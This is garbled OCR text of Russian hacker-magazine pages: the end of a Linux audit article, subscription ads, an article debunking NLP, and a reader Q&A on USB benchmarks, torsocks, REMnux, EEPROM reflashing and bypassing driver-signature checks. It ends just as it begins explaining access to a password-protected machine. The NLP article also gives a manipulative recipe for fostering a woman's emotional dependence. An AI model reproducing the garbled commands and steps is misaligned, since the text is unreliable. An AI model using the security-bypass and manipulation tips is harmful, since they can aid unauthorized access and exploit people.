для событий, завершившихся неудачно (флаг '-ЧаііесГ). 

АІІЮ и РАМ 

Во время своей работы в системе пользователь может исполь- 
зовать команды зи или зисіо для изменения своего системного 
идентификатора (ИГО), из-за чего процесс отслеживания его 
деятельности существенно усложняется. Чтобы обойти эту 
проблему система аудита использует так называемые Аисііі ИГО 
(АИШ), которые закрепляются за каждым пользователем во время 
его входа в систему и остаются неизменными даже несмотря на 
смену пользователем своего 11Ш с помощью зи или зисіо. Однако, 
по умолчанию функция присваивания АИШ отключена (именно 
поэтому восьмой столбец вывода аигерогі всегда содержит значе- 
ние -1), и, чтобы ее активировать, необходимо отредактировать 
некоторые конфигурационные файлы РАМ. Для этого открой файл 
/еіс/рат.сі/іо^іп и добавь строку «зеззіоп ^иігесі рат_1о§іпиіс1. 
зо» перед строкой «зеззіоп іпсіисіе соттоп-зеззіоп». Таким же об- 
разом измени конфигурационные файлы /еіс/рат.сі/ззіісі, /еіс/ 
рат.б/^бт (Мт, если ты используешь среду КЭЕ), /еіс/рат.сі/ 
сгопб и /еіс/рат.сі/аісі. 

Выводы 

Система аудита — достаточно низкоуровневый компонент Ьіпих, кото- 
рый требует глубоких знаний ОС для своей настройки и анализа жур- 
нальных файлов. Однако, разобравшись в нем, ты получишь мощней- 
ший инструмент слежения за системой, который поможет обнаружить 
аномалии в поведении системы и найти их виновника, ц-с 
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6 номеров 564 руб. 
13 номеров 1105 руб. 



6 номеров 785 руб. 

1 2 номеров 1 420 руб. 



6 номеров 1110 руб. 
12 номеров 201 б руб. 



6 номеров 810 руб. 
12 номеров 1470 руб. 



6 номеров 1 260 руб. 
1 2 номеров 2200 руб. 




6 номеров 1 260 руб. 
1 2 номеров 2200 руб. 



6 номеров 1 260 руб. 
12 номеров 2310 руб. 



6 номеров 900 руб. 
12 номеров 1720 руб. 



6 номеров 1 300 руб. 
1 2 номеров 2300 руб. 



6 номеров 1 300 руб. 
1 2 номеров 2300 руб. 



ПОДПИШИСЬ! 

зііор.діс.ги 



ВЫГОДА + ГАРАНТИЯ 

Редакционная подписка без посредников - это гарантия 
получения важного для Вас журнала и экономия до 40% 
от розничной цены в киоске 

8 - 800 - 200 - 3-999 




6 номеров 450 руб. 
1 3 номеров 975 руб. 




только на сайте 



4 номера 556 руб. 

8 номеров 1 008 руб. 



аюоспш 




щцдц 



6 номеров 630 руб. 
12 номеров 1130 руб. 




6 номеров 765 руб. 
12 номеров 1380 руб. 




6 номеров 1130 руб. 
1 2 номеров 2060 руб. 




6 номеров 890 руб. 
12 номеров 1630 руб. 




только на сайте 

2 номера 284 руб. 




6 номеров 960 руб. 
12 номеров 1740 руб. 




3 номера 630 руб. 

6 номеров 1140 руб. 




(дате)іаіиі 

МЕДИА ДЛЯ ЭНТУЗИАСТОВ 


















ІЛЧІТ5 



Оксана «Огіуапа» Андреева огіуапаШхрзусНо.ги 




Р5ѴСН0: 

НЛП: ОТРЕЗВЛЯЮЩИЙ КУРС 
ДЛЯ НАЧИНАЮЩИХ МАГОВ 

Выявляем уязвимые места в коде НЛП 



«Вы будете иметь 100% успех при устройстве на работу. На 
собеседовании потенциальные работодатели будут слушать 
Вас, затаив дыхание, даже если Вы будете говорить чушь. Ваши 
способности заставят их верить, что Вы — самый лучший кандидат, 
который им нужен. Станьте хозяином своей жизни! Притягивайте 
деньги! Станьте успешным во всем! Станьте избранным!» Все эти 
блага ты можешь получить, придя на обучение в центр НЛП. 
Такли это? Давай разберемся... 



ЯЯРМ®?Д»1 нуб0В: 

В далеком 1973 году в США собрались двое 
революционеров-бунтарей, не признающих 
рамок и условностей — Ричард Бендлер и 
Джон Гриндер; собрались для того, чтобы со- 
вершить переворот в сознании многих людей, 
использовав кибернетико-математические 
модели для управления психикой. Абсолютно 
новаторский эксперимент, основанный на 
психофизиологических опытах Павлова, 
философии Коржибски, кибернетических 
концепциях Прибрама и Джорджа Милле- 
ра и на работах Маслоу, Роджерса, Френка 
Фарелли и других гуманистических психоло- 
гов, обрел огромную популярность и совсем 
скоро перерос в целоетечение, получившее 
название НЛП — нейролингвистическое 
программирование. Название, конечно, 
сложноватое... Вот что говорит об этом один 
из основателей, Гриндер: «Когда мы писали 
первую книгу, нам нужно было как-то назвать 
то, чем мы занимаемся, и мы решили назвать 
это «НЛП». Мы не думали, что это заинтере- 
сует кого-то, помимо нашихучеников и узкого 
круга специалистов. Когда мы спохватились, 
то было уже поздно что-то менять». 
Изначально НЛП занималось выявлением 
конструктивных и успешных особенностей 



работы сознания и бессознательного извест- 
ных и продвинутыхлюдей, сведя ихдо уровня 
алгоритмов, и разработкой психотехник на 
основе этих алгоритмов. Идея стопроцентно 
революционная и заслуживающая бурных 
аплодисментов, посколькуона помогла 
обрести гармонию, успешность, моральное 
и физическое здоровье, изменить жизнь к 
лучшему многим людям. Проблема втом, что, 
каки любое популярноетечение, НЛП со вре- 
менем начало обрастать мифами и неправдо- 
подобными историями. Поэтому, если ты еще 
не стал жертвой таких легенд и не планируешь 
ею становиться, давай разберемся, какой 
информации доверять, а какой — нет. 

Азы НЛП глазами 
стороннего 
наблюдателя, „ 

или критический 
анализ базовых 
моментов 

На одном из пойнтов студентов-математиков- 
и -про грамм истов- и нтересующихся- 
психологией ребята, находясь под влиянием 
творческого вдохновения и судьбоносных 
инсайтов, выдвинули несколько предпо- 
ложений, которые в будущем легли в основу 
создания НЛП: 



1. Талантливый человек отличается от нета- 
лантливого наличием неосознаваемых стра- 
тегий поведения и реакции на влияющие 
внешние и внутренние обстоятельства; 

2 . Эти стратегии могут быть выведены 
на осознанный уровень специалистами- 
исследователями психики; 

3. Этим стратегиям можно обучить дру- 
гих, а также использовать их для успеш- 
ного достижения целей во всех жизнен- 
ных сферах. 

Другими словами, создатели изучили особен- 
ности интуиции и спонтанного реагирования 
талантливых и гениальных людей, разложили 
их на составляющие, перевели в алгоритмы и 
внедряют эти алгоритмы в сознание любому 
желающему. 

Цель, безусловно, очень благородная, нова- 
торская и несущая в себе элементы гениаль- 
ности (могли подумать великий дедушка 
Фрейд отом, что его детища — Ид, Эго и 
Суперэго — когда-нибудь будут безжалост- 
но расчленены и алгоритмизированы...?). 

И именно эта попытка помогла, например, 
заменить стандартные ошибки в обучении 
на более эффективные стратегии освоения 
нового материала. Но есть в этом всем не- 
которые моменты, которые не так однозначно 
оптимистичны, какхотелось бы Гриндеруи 
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НЛП — аббревиатура, плотно осевшая в мозгах многих сограждан 



Бендлеру. Итак, давай пройдемся по порядку 
по всем предположениям, которые стали 
базой для создания НЛП. 

1. Талантливый человек отличается от обыч- 
ного наличием бессознательных ментальных 
стратегий. Другими словами — хорошая 
интуиция, умение пользоваться осевшим в 
бессознательном пласте психики опытом. 

Да, действительно, чувствование помогает 
достигать успеха или избегатьтраблов, при 
этом часто гениальные открытия совер- 
шаются интуитивно. В целом, интуиция 
естьу каждого, она является обращением к 
бессознательному опыту, минуя логику; но 
помни отом, что если утебя нетхорошего 
жизненного опыта или, на худой конец, 
креп ко укоренившейся теории, то у твоей 
интуиции просто не будет базы данных, 
откуда достаются инсайты или спонтанные 
решения, приводящие куспеху. С другой 
стороны, каждая ситуация индивидуальна 
— в ней свои условия, действующие лица, 
состояния, настроения, моральные ценно- 
сти; и успешный опыт Леонардо да Винчи в 



похожей, но все-таки другой ситуации может 
привести кпечальным последствиям. В этом 
смысле чужой, даже алгоритмизированный 
опыт вряд ли окажется лучше, чем неотшли- 
фованный, но свой... 

«Плюс» этого подхода в том, что, предвари- 
тельно проиграв предложенные паттерны, 



ты сделаешь ихсвоим опытом, и позже они 
окажутся полезными. 

2 . Стратегии эти не осознаются самими 
талантами, но могут быть формализованы 
исследователями. 

Могут, конечно, могут... Но тут вот в чем 
прикол: 



или БУНТАРЬ? 

Сухую биографию Ричарда Бендлера пересказывать неинтересно. Намного интереснее тот 
факт, что один из создателей НЛП был личностью «оторви и выкинь»: в возрасте 10 лет он 
совершил первую попытку убийства отчима, подведя электрический провод к мокрому поло- 
вичку; в юношестве он был бунтарем, начав свою «карьеру» с течения протестующих хиппи. 
Всегда на все имел свое мнение и яростно отстаивал его, даже если речь шла о мельчай- 
ших деталях, чем доводил до отчаяния преподов. Если можно было нарушить правила, он 
обязательно пользовался этой возможностью. Ричард вообще любил пользоваться раз- 
личными асоциальными возможностями: алкоголь, кокаин, физическое насилие над женой, 
нелепые угрозы в адрес коллег по НЛП (обещал нанять мафию, чудак :]]. Чего только стоят 
судебные процессы, связанные с убийством проститутки (см. блок-врезку «Дело Корины 
Кристен») и отвоевыванием права называться интеллектуальным собственником НЛП... 
Изучая биографию этого гениального и до ужаса нестандартного человека, приходишь к 
выводу, что мотивацией для открытия чего-то нового может быть не только интерес, но и 
дикое желание противостоять принятым социальным нормам. 
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КОРИНЫ КРИСТЕН 

В 1986 году в городе Санта-Круз в доме Бендлера была убита выстрелом из писто- 
лета проститутка Корина Кристен, на футболке Ричарда была обнаружена ее кровь. 
Казалось бы, попадалово полное... Но Бендлер не зря родился гением — он сразу же 
перевел все стрелки на любовника несчастной женщины — Джеймса Морино. Суд 
длился три месяца: за это время Бендлер от души постебался над присяжными, пол- 
ностью копируя речь, позы, поведение, мимику и голос Морино. В итоге он настолько 
запутал заседателей, что те, ничтоже сумняшеся, оправдали обоих и постарались 
забыть навсегда «странное раздвоение в глазах». Кстати, не исключено, что это оче- 
редной миф (ну ладно, приукрашенная история] о чудесах НЛП. 





ПОЛНЫЙ СЕРТИФИКАЦИОННЫЙ 
КУРС 



ПСИХОЛОГИЯ лучшее 



Б. Боде их а мер 
N1, Холл 



Зачем тебе тренинги, бро? 
Прочитай книжку и фазу стань 
волшебником! 

• Далеко не все гении разрешат использо- 
вать себя в качестве подопытных кроликов; 

• Если и разрешат — не факт, что при этом 
продемонстрируют все свои неосознавае- 
мые (!!!) стратегии мышления и поведения; 

• Если и продемонстрируют — не факт, что 
в следующий раз в подобной ситуации они 
спонтанно не выдадут совсем другую, не 
менее успешную стратегию. Интуиция — 
это прежде всего гибкость (к чему, кстати, 
стремятся все НЛП’еры), а не набор шабло- 
нов. Почему, например, человек с хорошей 
интуицией знает, к кому можно подходить 
знакомиться, а к кому — нежелательно. 

3. Этим стратегиям могут быть обучены дру- 
гие люди, а также эти стратегии могут быть 
успешными во всех жизненных сферах. 

Хм... Вотздесь НЛП противоречит само себе. 
Если, следуя предписаниям, мы разделим 
человечество на множество типажей: ви- 
зуалов, кинестетиков, активных-пассивных, 
согласных-непаритетных, а также носителей 
множества других метапрограмм и карт мира, 
и учтем сочетание каждого из параметров 
внутри личности, то каждый человек полу- 
чится по-своему неповторимым. Болеетого, 
носительтакого наборного кода программ 
нетолько воспринимаетокружающий мир 
согласно своим особенностям, но и реаги- 
рует, ведет себя соответственно. Атеперь 
давай приблизительно прикинем: какова 
вероятность того, что алгоритм успешности 
талантливого человека с одним набором пси- 
хических особенностей (например, аудиал, 
ориентированный на время и личность, с 
внутренней референтной рамкой, бунтарь и 
т.п.) идеально ляжет на набортвоих психиче- 
скихособенностей (еслиты визуал, при- 
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Если при словосочетании «Карта мира» ты представляешь такую картинку, то ни за что тебе не зазомбировать 
толпу людей! 



слушиваешься ко мнению других и склонен к 
конформизму)? Это касается личных страте- 
гий успешности, таких какотношение кделу, 
ответственность, творческий потенциал. 

Мне можно возразить: «Все эти характери- 
стики можно скопировать и использовать 
для подстройки к другому человеку, чтобы... 
зазомбировать его (см. раздел «Мифы об 
НЛП»)». Давай рассмотрим это на при- 
мере. Допустим, ты решил сделать подарок 
своей нервной системе и идешь в магазин 
за новенькой системой охлаждения Согзаіг 
Н70, но денегутебя хватаеттолько на Н50. 

Что делать? Конечно, просить скидку. Ты за- 
ходишь в помещение и автоматически ищешь 
взглядом продавца. Сразуже прикидываешь 
способы влияния на него, анализируя его 
ведущую репрезентативную систему и способ 
обработки полученной извне информации. 
Скажу наперед: если он железный логик, а 
ты —творческий интуит(или наоборот), то 
может возникнуть недопонимание и вообще 
отсутствие личного коннекта, поэтому здесь 
подстройка и отражение окажется как нельзя 
кстати. И уже на этом этапе могут возникнуть 
трудности: что делать, если продавец облада- 
ет завидной логикой и не признает эмоций, а 
ты живешь эстетическими ощущениями, на- 
деешься на интуицию, и никогда не задумы- 
вался над разницей между «есбо» и «ргіпі» 

(а охлаждение тебе нужно только для того, 
чтобы бесшумно брутитьадминскиеучетки 
фотостоков):)? Можешь, конечно, взять его 
своим природным очарованием, однако, не 
факт, что сработает. Окей, не будем о плохом, 



все-таки ты хакер, и твоя логика тоже заслу- 
живает восхищения. 

Следующий этап — воздействие на субъект: 
подстраиваешься кего репрезентативной 
системе и начинаешь атаку словом, точнее, 
логическими доводами, ведь именно их он 
будет воспринимать адекватно. Тебе нужно 
доходчиво объяснить, почему он должен от- 
датьтебе охлаждение дешевле заявленной 
цены. Предположим, еслиты ему понравился 
(за счет подстройки или просто какчеловек), 
и ему нежалко подарить тебе разницу в цене 
— считай, что дело сделано. Но на этом этапе 
тоже возможны загвоздки: то, что для тебя мо- 
жет быть неоспоримым доказательством, для 
него окажется ничего незначащим фактом из 
твоей жизни, другими словами — ему плевать 
на твою карту мира, у него — своя. Это и есть 
распространенная проблема многихубеж- 
дающих: они забывают, что каждый человек 
смотрит на мир по-своему, и для того, чтобы 
оставить вмятину в его мировоззрении, тебе 
нужно заранее знать особенности этого само- 
го мировоззрения (или карты мира, если тебе 
такудобнее). Атеперь подумай: сможешьли 
ты сходу сориентироваться и подобрать аргу- 
менты, влияющие на конкретныеубеждения 
продавца? 

Но не отчаивайся — не всетак безнадежно. 
Во-первых, если удачно подстроишься, воз- 
можно, интуитивно начнешь мыслить, как 
он, и зерна твоих слов упадут в благодатную 
почву его мироощущения; во-вторых, в споре 
кто более уверен, тот и прав — если ты в своей 
позиции уверен больше, чем он в своей, он 



уступит. Если уверенность на одном уровне — 
здесьуже как получится... Хороший пример 
— диалог братьев с продавцом (книга Аготы 
Кристоф «Толстая тетрадь»): 

- Нам нужны эти вещи, но у нас нет 
денег . 

- Что? Но... нужно платить. 

- У нас нет денег, но нам совершенно 
необходимы эти вещи. 

Мы больше ничего не говорим, мы смо- 
трим на него . Он тоже на нас смотрит . 
У него на лбу выступает пот. Через 
минуту он кричит : 

- Не смотрите так на меня ! Выйдите 
отсюда ! 

Мы говорим: 

- В обмен на эти вещи мы готовы про- 
делать для Вас работу: полить вам 
огород, например... 

- У меня нет огорода! Вы мне не нуж- 
ны! И потом, вы что, не можете гово- 
рить нормально? 

- Мы говорим нормально . 

Он швыряет нашу бумагу, карандаши и 
тетрадь за дверь и орет: 

- Вон отсюда! Забирайте все и больше 
не возвращайтесь! 

Мы аккуратно подбираем вещи и гово- 
рим : 

- Однако нам придется вернуться , 
когда закончится бумага и испишутся 
карандаши . 
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Продвинутый НЛП'ер, Анатолий Кашпировский 



Ты понял? Продавца можно брать на измор, 
и когда он поймет, что его спокойствие 
дороже разницы в цене, возможно, ты по- 
лучишьжелаемую скидку. Если проанали- 
зировать ситуацию, ты увидишь, что успех 
дела зависит от многих факторов: тщатель- 
ной подготовки, отчасти от везения, твоего 
умения чувствовать и влиять на чувства 
(логику], настроения, мотивации и личност- 
ной структуры продавца, его готовности 
идти на уступки и ценность вещи, которую 
он готов уступить. Но речь о «зазомбировать 
техниками НЛП» здесь не идет. Эти техники 
действительно могут помочьтебе получить 
желаемое, если тому сопутствуют благо- 
приятные обстоятельства, или смягчить эти 
обстоятельства, если они неблагоприятны. 
Но осуществить маловероятное с помощью 
парочки приемов НЛП тебе вряд ли удастся; 
для этого больше подойдет гипноз. 

Мифы об НЛП 

Надеюсь, ты не сильно разочаровался, со- 
зерцая, как рушатся представления о чуде- 
сах НЛП? Моя сегодняшняя цель — вывести 
тебя из состояния НЛП-эйфории и вогнать в 
жестокую депрессию реальности. Поэтому я, 
наверное, поиграю в разрушителя мифов :]. 

Якорение ака Волшебная палочка 

Во время подготовки статьи редактор задал 
вопрос: можноли, применяя техники НЛП, 
например, якорение, влюбить в себя самую 
прекрасную девушку на свете? Какодна из 
самых прекрасных девушекна свете, я от- 
вечу: «Ха-ха-ха!». Какавтор статьи про НЛП, 
скажу: «Конечноже». Как психолог, могу 
сказать: «Можно, и необязательно с помо- 
щью я корения или вообщетехникНЛП».Ты 
уже знаешь, что якорение производится на 
пике эмоционального переживания, при- 
чем считается, что в момент переживания 
позитивных эмоций происходит позитивное 
якорение, при негативных переживаниях — 
негативное. Нотакое разделениеусловно, и 
это можно доказать на примере с «влюбить в 



себя прекрасную девушку». В момент, когда 
человек переживает пи к позитивных эмоций, 
он очень самодостаточен, ему уже хорошо, и 
кто находится рядом — ты, кто-то другой или 
вообще никого — не столь важно, так какой 
сосредоточен на источнике позитива. Кроме 
того, «якорение» — это слишком заумное сло- 
во. На самом деле, речь идето виде ассоциа- 
ций, и если в момент радужных переживаний 
ты возьмешь ее за запястье, будь готов ктому, 
что ассоциация может пойти не в ту сторону, то 
есть она это заметит и подумает: «Странный 
какой-то... Чего он хочет?», и в следующий раз 
при прикосновении кзапястью мысли будут 
приблизительнотакими: «Хм... что мне это на- 
поминает? Ааа, вспомнила! Это же тот самый 
Вася! Чего он от меня тогда хотел, странно...» 

В моменты отчаяния человек, наоборот, 
теряет целостность, и ему нужна моральная 
поддержка. Вотздесьутебя шансов на- 
много больше: в нужный момент оказаться 
рядом, развеселить или помочь в решении 
проблемы. Благодаря тебе она восстановит 
утраченную целостность, и в итоге получит- 
ся формула: она (в слезах) +ты (и твоя под- 
держка) = целостность. Если такие случаи 
будут случаться регулярно, это войдет в при- 
вычку, и вот что мы имеем: целостность - ты 
(и твоя поддержка) = она (в слезах). Тут даже 
некоторая зависимость получается, а там и 
до влюбленности недалеко (особенно если 
ты — красавчик]. Чтобы проверить дей- 
ственность метода, после всех приключений 
заговори о другой девушке, если заметишь 
что-то типа обиды или ревности — считай, 
схема сработала. Якорение в данном случае 
не нужно, подстройка с отзеркаливанием 
— тоже. То есть они не помешают, особенно 
если ты профессионально владеешь этими 
техниками, но не они являются решающими 
факторами в процессе завоевания. 

С помощью НЛП можно 

зазомбировать 

человека или группу людей 

Во всем виновата тяга к зрелищам. В со- 
ветское время, если помнишь, «сказочности» 




Подстроишься к ее репрезентатив- 
ной системе ради скидки? 



катастрофически не хватало; после распада 
СССР появился отряд различных гипно- 
тизеров потипу Анатолия Кашпировского 
и Алана Чумака, которые компенсировали 
фрустрированному народу всю нехватку чудес 
в виде чудодейственного исцеления, чутьли 
не оживления мертвых (воттебе и зомбирова- 
ние). Экраны наших черно-белых или плохо- 
цветныхтелевизоров пестрели воющими и 
ревущими людьми сзакрытыми глазами, рас- 
качивающимися в та кт музыке, сопровождаю- 
щей вкрадчиво-директивную речь гипнотизе- 
ра. Именно в это время явления самогипноза 
и эффекта плацебо побили все рекорды, при 
этом дали надежду на то, что можно нехитрой 
комбинацией слов заставить человека делать 
то, что тебе нужно. И поскольку Чумаков и 
Кашпировских было всего двое, и они были 
несравненными, то НЛП, предлагавшеетво- 
ритьтакиеже чудеса, только без врожденного 
таланта, пришлось какраз в пору. Магические 
и непонятные слова «рефрейминг», «мета- 
модель», «якорение», «субмодальность», 
«калибровка» пошли в качестве эффективной 
приправы при создании «чуда». 
Теперьозомбировании: еслиты думаешь, что 
с помощью какой -то тех ники можно начисто 
отформатировать сознание другого человека 
и инсталлировать свои программы — воз- 
можно, ты прав, но только еслиты — талант- 
ливый психотерапевте отличным владением 
гипнотехниками, а будущий зомби согласен 
провести над собой подобный опыт. Если же 
ты прошел только первую-вторую ступень 
«НЛП-Практик» (на более поздних ступе- 
нях цель «зазомбировать» уже не является 
настолько значимой), а твой подопытный не 
хочет становиться зомби, то, скорее всего, ты 
столкнешься с суровой реальностью. 

НЛП — наука 

Профессиональные психотерапевты 
саркастически ухмыляются, заслышав это 
утверждение, исходя из которого, в общем, 
пикаперов можно назвать научными исследо- 
вателями. 

Какя писала выше, в качестве базы 
нейролингвистического программирова- 
ния были использованы элементы разных 
наук, но при этом НЛП официально не 
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Если процесс зомбирования пойдет не так, «ЬеМОеаб» для тебя может стать реальностью 



считается самостоятельной наукой. Почти 
все техники были заимствованы или из 
других психологическихтечений, или из 
эзотерики, категориальный аппараттоже 
не самодостаточен — если перевести 
заумные термины НЛП на нормальный 
язык, то «я корен и е» станет «ассоциаци- 
ей», «карта мира» — «мировоззрением», 
«рефрейм инг» — «переосмыслением». В 
целом, научные исследования, даже если 
они базируются на теории и практике дру- 
гих наук, подразумевают разносторонний 
взгляд на изучаемый объект или явление. В 
НЛП за основу взяты работы, как правило, 
одного-двух ученых из каждой сферы (ис- 
ключением является психология). То есть 
подход — односторонний, поэтому можно 
предположить, что создатели могли много 
чего упустить. Сейчас вообще мало тех, 
кто действительно серьезно, с научным 
подходом, занимается НЛП; в основном 
это тренеры-самоучки или закончившие 
3-4 ступени, обучающие всех желающих, 
способных оплатить курс. И плевать при 
этом на особенности психики, научный 
подход, побочные явления и искаженную 
информацию. 

Ну и контрольный в голову: наука имеет дело 
с закономерностями, доказательствами, ис- 
следованиями, измерениями; комбинатори- 
ка является лишь частью некоторых наук. 

В популярном НЛП ни одна техника не дает 
чистого результата даже на 70-80% (под чи- 
стым результатом я подразумеваю результат, 
который дала непосредственнотехника, при 
этом не беру в учетудачное стечение обстоя- 
тельств, воздействие другими способами и 
тому подобное), не говоря уже об исследова- 
тельской стороне. 



Предостережения 

Возможно, ты — человек, непредвзято на- 
строенный, и понимаешь, что все сказанное 
выше — это всего лишь моя «карта мира». 

И в этом ты абсолютно прав. Итак, если ты 
все-таки решил заняться НЛП — это замеча- 
тельно, потому что развивать наблюдатель- 
ность и запоминать сложные слова — это 
намного лучше, чем бесцельно бороздить 
сайты соцсетей. Да, техники действительно 
сперты из других научных и эзотерических 
направлений, и несмотря нато, что далеко 
не всегда они отвечаютзадекларированным 
результатам, все же позитивный результат при 
грамотном подходе обеспечен. 

И наконец, пара слов о грамотном подходе, 
или какие пасть жертвой обратной стороны 
медали. 

1. В погоне за стремительной эффективно- 
стью современные тренеры забывают о том, 
что НЛП — это работа с психикой, своей и 
чужой. И вся опасность состоит в том, что 
метапрограммирование учит, как работать 
с подсознанием, но не уделяет достаточно 
внимания тому, как работает само подсо- 
знание и его подводные камни. Очень редко 
среди фанатов НЛП можно встретить настоя- 
щих психологов, окончивших хотя бы вуз, 
не говоря уже о классической профессио- 
нальной практике. А ведь именно практика 
в полевых условиях (а не на тренингах) дает 
понимание основ. Кстати, похожая проблема 
сейчас в гештальт-психологии (направле- 
нии, которое приписывает психике вос- 
приятие окружающего мира как целостной 
структуры, а не отдельных элементов): один 
институт штампует «специалистов» — чело- 
век приходит на личную терапию, ходит год- 
полтора, решает (или не решает) свою про- 



блему, после чего получает диплом и право 
«лечить» других. После таких парикмахеров, 
продавцов, бухгалтеров, получивших «годо- 
валый» диплом гештальт-терапевта, профес- 
сиональные психологи «утопают» в клиентах 
с искалеченной психикой... 

2 . Одержимые желанием зомбировать всех 
подряд, многие «будущие» НЛП’еры не 
замечают того, как сами превращаются в 
зомби: все, сказанное харизматичным тре- 
нером, принимают на веру, даже не пытаясь 
критически проанализировать услышанное. 

И зачастую попытка влиять на сознание 
других людей превращается в самообман, 
который при длительном воздействии на 
психику самого практикующего грозит раз- 
личными психическими расстройствами (в 
зависимости от темперамента и особенно- 
стей личности). 

3. При выборе учителя или института 
будь осторожен и внимателен: сейчас 
очень мало людей, которые действи- 
тельно продвинуты в НЛП. Как правило, 
90% тренеров — это такие же люди, как 
ты, только закончившие 2-3 ступени, и 
большинством из них движет не инте- 
рес и тяга к обучению, а жажда про- 
фита. Поэтому, едва закончив курс, они 
сразу проводят набор новобранцев и 

с энтузиазмом пересказывают им кон- 
спекты, исписанные пару месяцев назад. 
Возможно, благодаря таким экземплярам 
НЛП из разряда гипотетически возмож- 
ной науки перешло в разряд сектоподоб- 
ного МИМ (многоуровневый маркетинг). 
Подытожив все написанное, можно сказать, 
что не чудесная аббревиатура НЛП, а инди- 
видуальное чувствование, понимание и 
опыт дают успех и результативность, т 
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■ ■ Антон Жуков 




Есть вопросы, присылай 
на Іад@геаІ.хакер.ги 



О: Подарили флешку, но она невероят- 
но тормозная. Пробовал на разных ком- 
пьютерах — результат один и тот же. 
Есть ли какой-нибудь удобный тест для 
флешек, чтобы при покупке не обла- 
жаться и не купить такого же «запорож- 
ца»? Какие флешки самые быстрые? 

А: Для измерения скорости записи/чтения с 
115В- накопителей есть специальный бенч- 
марк— 115В РІазЬ ВепсЬтагк, который можно 
скачать с изЫЧазбзреесІ.сопп . Утилита отправ- 
ляет результаты измерений на сайт, поэтому 
для всехжелающих аккумулируется статисти- 
ка по большому количеству пендрайвов. Если 
ищешь быструю флешку, обрати внимание на 
список«Тор 1 0 оНЬе ^азіезі РІазЬ Вгіѵез» и 
выбери себе подходящий вариант. Например, 
один из рекордсменов, Зііісоп Роѵѵег І_ихМіпі 
920, стоит около 1 000 р. 

О: Как под линуксом пустить трафик 
приложений через безопасную сеть Тог? 

А: Если приложение поддерживает работу 
через Зоскз, то ситуацию легко разрешить 
с помощью утилиты Тогзоскз [ сосіе.аооаіе. 



сот/рАогзоскз ). Использовать ее очень 
просто: 

арЦ-деС іпзкаіі когзоскз 
иземіСкког ззк изегпатеѲззЪ. . сот 

ИЛИ 

когзоскз рісідіп 

Хочу предупредить об одном неприятном 
моменте — некоторые приложения, даже пу- 
щенные через Тогзоскз, умудряются пускать 
0Ы5-запросы напрямую. На сайте разработ- 
чика есть та блица, где он делится результата- 
ми своихэкспериментов, рассказывая, какие 
из программ этим грешат. 

О: Есть ли специальные дистрибутивы, 
заточенные для анализа Маіѵѵаге? 

А: Если ты ищешьѴѴіпсІоѵѵз-сборку с ОНуйбд, 
ЮА Рго для образцов червей и прочими 
утилитами на борту, то, вероятно, ничего 
подходящего я тебе не подскажу. Зато есть 
замечательный дистрибутив РЕМпих [ геИзен 
сот/гетпих ). разработку которого ведет 
известный специалистпо информационной 



безопасности. В состав ОС, построенной 
на базе ІІЬипІи, входят утилиты для анали- 
за РОЕ- и Еіазб-файлов, инструменты для 
отслеживания сетевой активности, тулзы для 
деобфускации 05-кода, утилиты для анализа 
шеллкодов, распаковщики и многое другое. 
РЕМпих можно скачать в виде 1_іѵеСО или об- 
раза ѴМѵѵаге, который можно запустить через 
бесплатный ѴМѵѵаге Ріауег. 

О: Приятель говорит, что в своем ноут- 
буке смог активировать поддержку 
802 . 1 ІП, которой изначально не было. 
Сказал, что если у меня \Л/і-Рі на базе 
чипсета АіНегоз, то я тоже смогу так 
сделать. Это реально? 

А: Не совсем так — необходимо, чтобы в ноут- 
буке в качестве ѴѴі-Еі-модуля использовался 
чип Аібегоз АР9ххх. В этом случае шанс есть. 
Это связанно с отсутствием сертификации 
стандарта 802.1 1 п в России, поэтому многие 
ноутбуки продаются с заблокированной его 
поддержкой. Для активации есть два способа. 
Самый верный — перепрошить ЕЕРРОМ, но 
нужно иметь в виду, что в этом случае есть не- 
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Рейтинг самых быстрых флешек 



большой риск испортить карту. Прошиваль- 
щик можно взять по адресу гдЬозБги/2603267 . 
Перед тем, как приступать к записи, под 
ѴѴіпсІоѵѵз ѴізІа/7 х64 необходимо отключить 
проверку цифровых подписей драйверов; для 
этого надо нажать на <Р8> передзагрузкой 
системы и выбрать соответствующий пункт. 
После всех приготовлений выполняем следу- 
ющие несложные шаги: 

1. Запускаем единственный би на рн и к — 
аіЬего5_еергот_Іоо1.ехе; 

2. Выбираем «Реаб БЕРРОМ» для сохра- 
нения дампа БЕРРОМ, указываем путь для 
сохранения и жмем кнопку «РЕАБ». 

3. Теперь, когда есть дамп, необходимо 
подправить несколько параметров и залить 
его обратно в БЕРРОМ. Выбираем «ѴѴгіІе 
БЕРРОМ» и указываем в качестве файла 
только что сохраненный дамп. 

4. Далее нажимаем на кнопку «Мосіез а пб 
Сбаппеіз» и принимаем предупреждение. 

5. В разделе «Мобез» отмечаем галочка- 
ми пункты «802.1 1 п (20М Нг)» и «802.1 1 п 
( 4 ОМН 2 )» для 2.40РІ2. Здесьже можно активи- 
ровать диапазон 50РІ2. В разделе «СЬаппеІз» 
выбираем «0x67» и нажимаем «ОК». 

13. Проверяем, чтобы была активна опция 
«ІІзе сизіот тобез апб сбаппеіз», и нажима- 
ем «ѴѴРІТЕ». 

14. Все, после этого остается лишь перезагру- 
зить систему. 

Более простой способ заключается в ус- 
тановке пропатченных драйверов ( гдЬозБ 
ги/2501 075 ]. Для этого через «Диспетчер 
устройств» необходимо найти свой адаптер 
и вручную обновить для него драйвер. Про- 
блемы могут возникнуть под \А/іпбо\л/з7 х64, 
которая будет ругаться на отсутствие подписи 
у драйверов. Ситуацию поможет исправить 
ОгіѵегЗідпаІиге Епіюгсетепі Оѵеггібег[ \ллллл/. 
пдобд.сот/боте.рбр?раде=бзео ]. 

О: А у меня почему-то 802.1ІП не ра- 
ботает, хотя точка доступа и модуль в 
ноутбуке этот стандарт поддерживают. 

А: Первым делом стоит проверить настройки 
ѴѴі-Бі. Стандарт 802.1 1 п требует обязательно- 
го использования ѴѴРА2-Р5К+АЕ8 — необ- 



ходимо убедиться, что в точке доступа был 
выбран именно этот режим работы. Для 
максимальной скорости рекомендуется ис- 
пользовать ширину канала 40МНг и каналы 
с 1 по 9. 

О: Есть доступ к компьютеру, на кото- 
ром стоят ѴУ/іпсІоѵѵз и Шлих (использует- 
ся загрузчик СРІІВ). Можно ли получить 
доступ к данным на этой машине при 
условии, что пароли к аккаунтам (линукс 
и виндовс) неизвестны, а БИОС запаро- 
лен. 

А: Ситуация, когда в БИОС заблокирована 
загрузка с внешних носителей, а пароль рута 
неизвестен, удивления ни у кого не вызывает. 
Но в системе все-таки остается слабое звено 
